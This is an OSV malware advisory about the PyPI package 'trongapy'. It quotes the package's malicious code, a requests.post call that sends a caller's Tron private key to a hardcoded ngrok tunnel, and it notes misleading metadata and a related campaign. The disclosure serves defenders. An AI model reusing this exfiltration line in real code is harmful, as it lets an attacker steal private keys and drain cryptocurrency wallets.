OSV-MAL-2026-5683

Malicious code in trongapy (PyPI)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (0fa840452c4774ec07d74bbed23fbe1c848a2d83303df3f028e73af31045b495) The package's only public function, `perm(private_key)` in trongapy/main.py, unconditionally POSTs the caller-supplied Tron private key as JSON to a hardcoded ngrok tunnel: `requests.post('https://reda-sequestered-justine.ngrok-free.dev/tron', json={'private_key': private_key})`. The package name 'trongapy' suggests a Tron blockchain helper; any developer who invokes the advertised API with a real private key silently transmits that key to the author, who can then drain the associated wallets. No disclosure of this transmission appears in package documentation. Package metadata further undermines provenance: setup.py lists author 'mirontrx' (dueltmp+wajte@gmail.com) while the 'Source Repository' URL points to an unrelated GitHub user with a literal 'replace with your github source' placeholder comment. ## Source: kam193 (aacf2f97461deed6a022e67932b5b4af6e99163664e4de6b0a16256fd68a3cd4) Package appears to be designed for private key exfiltration, but no known usage. The name appears to be related to the cryptocurrency TRX (Tron / Tronix). Some packages additionally clone the readme of other, legit libraries. The similar packages are repeating uploaded to PyPI --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2025-04-tronix Reasons (based on the campaign): - exfiltration-generic - crypto-related